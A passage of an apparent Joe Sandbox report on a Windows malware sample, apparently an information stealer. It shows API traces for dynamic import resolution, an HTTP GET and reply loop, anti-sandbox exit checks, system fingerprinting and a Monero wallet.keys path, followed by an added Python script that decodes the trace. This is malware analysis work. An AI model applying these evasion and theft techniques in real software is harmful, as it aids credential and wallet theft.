                                • GetProcAddress.KERNEL32(75A70000,00D958B0), ref: 00EDA436
                                • GetProcAddress.KERNEL32(75A70000,00DAD0F0), ref: 00EDA44E
                                • GetProcAddress.KERNEL32(75A70000,00DAD0A8), ref: 00EDA466
                                • GetProcAddress.KERNEL32(75A70000,00DAD1C8), ref: 00EDA47F
                                • GetProcAddress.KERNEL32(75A70000,00DAD288), ref: 00EDA497
                                • GetProcAddress.KERNEL32(75450000,00D95930), ref: 00EDA4B8
                                • GetProcAddress.KERNEL32(75450000,00D95830), ref: 00EDA4D1
                                • GetProcAddress.KERNEL32(75DA0000,00D95990), ref: 00EDA4F2
                                • GetProcAddress.KERNEL32(75DA0000,00DAD120), ref: 00EDA50A
                                • GetProcAddress.KERNEL32(6F070000,00D95810), ref: 00EDA530
                                • GetProcAddress.KERNEL32(6F070000,00D956D0), ref: 00EDA548
                                • GetProcAddress.KERNEL32(6F070000,00D95850), ref: 00EDA560
                                • GetProcAddress.KERNEL32(6F070000,00DAD0D8), ref: 00EDA579
                                • GetProcAddress.KERNEL32(6F070000,00D958F0), ref: 00EDA591
                                • GetProcAddress.KERNEL32(6F070000,00D95950), ref: 00EDA5A9
                                • GetProcAddress.KERNEL32(6F070000,00D95690), ref: 00EDA5C2
                                • GetProcAddress.KERNEL32(6F070000,00D95910), ref: 00EDA5DA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00EDA5F1
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00EDA607
                                • GetProcAddress.KERNEL32(75AF0000,00DAD2B8), ref: 00EDA629
                                • GetProcAddress.KERNEL32(75AF0000,00DA8E08), ref: 00EDA641
                                • GetProcAddress.KERNEL32(75AF0000,00DAD138), ref: 00EDA659
                                • GetProcAddress.KERNEL32(75AF0000,00DAD2D0), ref: 00EDA672
                                • GetProcAddress.KERNEL32(75D90000,00D95730), ref: 00EDA693
                                • GetProcAddress.KERNEL32(6E470000,00DAD2E8), ref: 00EDA6B4
                                • GetProcAddress.KERNEL32(6E470000,00D95970), ref: 00EDA6CD
                                • GetProcAddress.KERNEL32(6E470000,00DAD1E0), ref: 00EDA6E5
                                • GetProcAddress.KERNEL32(6E470000,00DAD300), ref: 00EDA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction ID: 5363d1f480e521ee60601923a45c3fc1e8255b7e512b5ad92d5b683751ce2cc6
                                • Opcode Fuzzy Hash: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction Fuzzy Hash: 21620AB5D10700AFC36EDBA8F99895637F9FF8C301714853AA626C324CD6BA95C1DB50

                                 Control-flow Graph (legend: Executed / Not Executed; the rendered graph is not reproduced in text, its node and edge listing follows)
                                 control_flow_graph 1033 ec6280-ec630b call eda7a0 call ec47b0 call eda740 InternetOpenA StrCmpCA 1040 ec630d 1033->1040 1041 ec6314-ec6318 1033->1041 1040->1041 1042 ec631e-ec6342 InternetConnectA 1041->1042 1043 ec6509-ec6525 call eda7a0 call eda800 * 2 1041->1043 1045 ec64ff-ec6503 InternetCloseHandle 1042->1045 1046 ec6348-ec634c 1042->1046 1062 ec6528-ec652d 1043->1062 1045->1043 1048 ec634e-ec6358 1046->1048 1049 ec635a 1046->1049 1051 ec6364-ec6392 HttpOpenRequestA 1048->1051 1049->1051 1053 ec6398-ec639c 1051->1053 1054 ec64f5-ec64f9 InternetCloseHandle 1051->1054 1055 ec639e-ec63bf InternetSetOptionA 1053->1055 1056 ec63c5-ec6405 HttpSendRequestA HttpQueryInfoA 1053->1056 1054->1045 1055->1056 1058 ec642c-ec644b call ed8940 1056->1058 1059 ec6407-ec6427 call eda740 call eda800 * 2 1056->1059 1067 ec644d-ec6454 1058->1067 1068 ec64c9-ec64e9 call eda740 call eda800 * 2 1058->1068 1059->1062 1071 ec6456-ec6480 InternetReadFile 1067->1071 1072 ec64c7-ec64ef InternetCloseHandle 1067->1072 1068->1062 1076 ec648b 1071->1076 1077 ec6482-ec6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 ec648d-ec64c5 call eda9b0 call eda8a0 call eda800 1077->1080 1080->1071
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction ID: 4faf9c343916c4719918b08bc4c6ef8cee0c9e15235901a289acdbad909ce40d
                                • Opcode Fuzzy Hash: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction Fuzzy Hash: 9E713B71A00358ABDB28DB90DC49FEE77B4FB44700F1091A9F50A7B284DBB56A86CF51
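The resolver at 00ED9C10 above (eight LoadLibraryA calls followed by roughly a hundred GetProcAddress calls, almost all with a pointer rather than a readable name as second argument) and the WinINet routine at 00EC6280 both show their arguments as raw hex, which hides what the sample actually asked for. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in the report's `Api.MODULE(arg,arg,...), ref: ADDR` format, counts GetProcAddress resolutions per module handle, and decodes the WinINet arguments (InternetOpenA access type, InternetConnectA service and port, HttpOpenRequestA flags, InternetSetOptionA option, HttpQueryInfoA info level, InternetReadFile chunk size) using the wininet.h values. The embedded trace is a constructed subset copied from the two entries; the function names, the selection of flags decoded and the output wording are my own choices.

```python
"""Parse Joe Sandbox per-function API lines and decode WinINet constants (added example)."""
import re
from collections import Counter

# Constructed sample: a subset of the API lines copied from the resolver
# at 00ED9C10 and the HTTP routine at 00EC6280 in this report.
SAMPLE_TRACE = """
GetProcAddress.KERNEL32(74DD0000,00D95570), ref: 00ED9C2D
GetProcAddress.KERNEL32(74DD0000,00D95590), ref: 00ED9C45
LoadLibraryA.KERNEL32(00DACDC0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA03D
GetProcAddress.KERNEL32(75290000,00D95870), ref: 00EDA0DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00EDA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00EDA607
InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC646D
"""

CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})")

# Values from wininet.h (a subset; highest bit first so the decoded list is ordered).
INTERNET_FLAGS = {
    "INTERNET_FLAG_RELOAD": 0x80000000, "INTERNET_FLAG_NO_CACHE_WRITE": 0x04000000,
    "INTERNET_FLAG_SECURE": 0x00800000, "INTERNET_FLAG_KEEP_CONNECTION": 0x00400000,
    "INTERNET_FLAG_NO_AUTO_REDIRECT": 0x00200000, "INTERNET_FLAG_NO_COOKIES": 0x00080000,
    "INTERNET_FLAG_NO_UI": 0x00000200, "INTERNET_FLAG_PRAGMA_NOCACHE": 0x00000100,
}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_LEVELS = {0x13: "HTTP_QUERY_STATUS_CODE"}

def parse_calls(text):
    """Return [(api, module, args, ref)]; a '?' argument (unreadable at trace time) becomes None."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if m:
            raw = m.group("args")
            args = [None if a == "?" else a for a in raw.split(",")] if raw else []
            calls.append((m.group("api"), m.group("module"), args, m.group("ref")))
    return calls

def _hexarg(arg):
    """Integer value of a hex argument; None for '?' or a plain-text argument such as GET."""
    return int(arg, 16) if arg is not None and re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None

def decode_http_open_flags(value):
    """Names of the INTERNET_FLAG_* bits set in an HttpOpenRequestA dwFlags value."""
    names = [name for name, bit in INTERNET_FLAGS.items() if value & bit]
    rest = value & ~sum(INTERNET_FLAGS.values())
    return names + ([f"0x{rest:08X}"] if rest else [])

def annotate_wininet(calls):
    """Map the ref address of each WinINet call to a reading of its hex arguments."""
    notes = {}
    for api, _module, args, ref in calls:
        if api == "InternetOpenA" and len(args) >= 2:
            notes[ref] = "access type " + OPEN_TYPES.get(_hexarg(args[1]), str(args[1]))
        elif api == "InternetConnectA" and len(args) >= 6:
            port = _hexarg(args[3])  # 0 is INTERNET_INVALID_PORT_NUMBER: default port for the service
            notes[ref] = "%s, port %s" % (SERVICES.get(_hexarg(args[5]), str(args[5])),
                                           "default (INTERNET_INVALID_PORT_NUMBER)" if port == 0 else port)
        elif api == "HttpOpenRequestA" and len(args) >= 7 and _hexarg(args[6]) is not None:
            notes[ref] = "verb %s, flags %s" % (args[1], "|".join(decode_http_open_flags(_hexarg(args[6]))))
        elif api == "InternetSetOptionA" and len(args) >= 4:
            notes[ref] = "option %s, %s-byte value" % (OPTIONS.get(_hexarg(args[1]), str(args[1])), _hexarg(args[3]))
        elif api == "HttpQueryInfoA" and len(args) >= 2:
            notes[ref] = "info level " + QUERY_LEVELS.get(_hexarg(args[1]), str(args[1]))
        elif api == "InternetReadFile" and len(args) >= 3 and _hexarg(args[2]) is not None:
            notes[ref] = "reads up to %d bytes per call" % _hexarg(args[2])
    return notes

def resolver_summary(calls):
    """Count GetProcAddress resolutions per module handle (first argument) and keep the
    names the tracer could read; the others appear only as pointers into the sample."""
    per_handle, plain_names, loads = Counter(), [], 0
    for api, _module, args, _ref in calls:
        if api == "GetProcAddress" and len(args) == 2:
            per_handle[args[0]] += 1
            if args[1] is not None and _hexarg(args[1]) is None:
                plain_names.append(args[1])
        elif api == "LoadLibraryA":
            loads += 1
    return {"loadlibrary_calls": loads, "getprocaddress_per_handle": dict(per_handle),
            "plain_names": plain_names}

if __name__ == "__main__":
    trace = parse_calls(SAMPLE_TRACE)
    for ref, note in sorted(annotate_wininet(trace).items()):
        print(ref, note)
    print(resolver_summary(trace))
```

Run on the lines above it reports that the request is opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE on the default HTTP port, that the option set before HttpSendRequestA is INTERNET_OPTION_SECURITY_FLAGS (the value itself is `?` in the trace, so whether certificate errors are ignored cannot be read from this report), that the reply is checked with HTTP_QUERY_STATUS_CODE and then read in 1999-byte chunks. Only the two resolutions that match the function's String ID (InternetSetOptionA and HttpQueryInfoA) carry a plain name; the rest are pointers the tracer did not dereference, which is why a static import table for this sample would not show what it calls. Feeding the script the full list rather than the subset gives the per-module counts that the signature "Extensive use of GetProcAddress" summarises.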

                                 Control-flow Graph (legend: Executed / Not Executed; the rendered graph is not reproduced in text, its node and edge listing follows)
                                 control_flow_graph 1090 ed5510-ed5577 call ed5ad0 call eda820 * 3 call eda740 * 4 1106 ed557c-ed5583 1090->1106 1107 ed5585-ed55b6 call eda820 call eda7a0 call ec1590 call ed51f0 1106->1107 1108 ed55d7-ed564c call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1106->1108 1124 ed55bb-ed55d2 call eda8a0 call eda800 1107->1124 1134 ed5693-ed56a9 call edaad0 StrCmpCA 1108->1134 1138 ed564e-ed568e call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1108->1138 1124->1134 1139 ed57dc-ed5844 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1134->1139 1140 ed56af-ed56b6 1134->1140 1138->1134 1269 ed5ac3-ed5ac6 1139->1269 1142 ed56bc-ed56c3 1140->1142 1143 ed57da-ed585f call edaad0 StrCmpCA 1140->1143 1147 ed571e-ed5793 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1142->1147 1148 ed56c5-ed5719 call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1142->1148 1162 ed5865-ed586c 1143->1162 1163 ed5991-ed59f9 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1143->1163 1147->1143 1246 ed5795-ed57d5 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1147->1246 1148->1143 1169 ed598f-ed5a14 call edaad0 StrCmpCA 1162->1169 1170 ed5872-ed5879 1162->1170 1163->1269 1198 ed5a28-ed5a91 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1169->1198 1199 ed5a16-ed5a21 Sleep 1169->1199 1177 ed587b-ed58ce call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1170->1177 1178 ed58d3-ed5948 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 ed594a-ed598a call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1178->1275 1198->1269 1199->1106 1246->1143 1275->1169
                                APIs
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5857
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00ED51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED5383
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00ED5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934

                                 Control-flow Graph (rendered graph of the function at 00ED17A0 omitted; blocks were marked Executed / Not Executed)
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00ED17C5
                                • ExitProcess.KERNEL32 ref: 00ED17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458

                                 Control-flow Graph (rendered graph of the function at 00ED7500 omitted; blocks were marked Executed / Not Executed)
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00ED7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED760A
                                • wsprintfA.USER32 ref: 00ED7640
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2338), ref: 00ED98A1
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA21B8), ref: 00ED98BA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2380), ref: 00ED98D2
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2230), ref: 00ED98EA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA21D0), ref: 00ED9903
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA8E48), ref: 00ED991B
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D95210), ref: 00ED9933
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D953D0), ref: 00ED994C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA22F0), ref: 00ED9964
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2398), ref: 00ED997C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2248), ref: 00ED9995
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2350), ref: 00ED99AD
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00D95410), ref: 00ED99C5
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(74DD0000,00DA2368), ref: 00ED99DE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC11D0: ExitProcess.KERNEL32 ref: 00EC1211
                                  • Part of subcall function 00EC1160: GetSystemInfo.KERNEL32(?), ref: 00EC116A
                                  • Part of subcall function 00EC1160: ExitProcess.KERNEL32 ref: 00EC117E
                                  • Part of subcall function 00EC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                  • Part of subcall function 00EC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                  • Part of subcall function 00EC1110: ExitProcess.KERNEL32 ref: 00EC1143
                                  • Part of subcall function 00EC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                  • Part of subcall function 00EC1220: ExitProcess.KERNEL32 ref: 00EC1294
                                  • Part of subcall function 00ED6770: GetUserDefaultLangID.KERNEL32 ref: 00ED6774
                                  • Part of subcall function 00EC1190: ExitProcess.KERNEL32 ref: 00EC11C6
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0

                                 Control-flow Graph (rendered graph omitted; blocks were marked Executed / Not Executed)
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
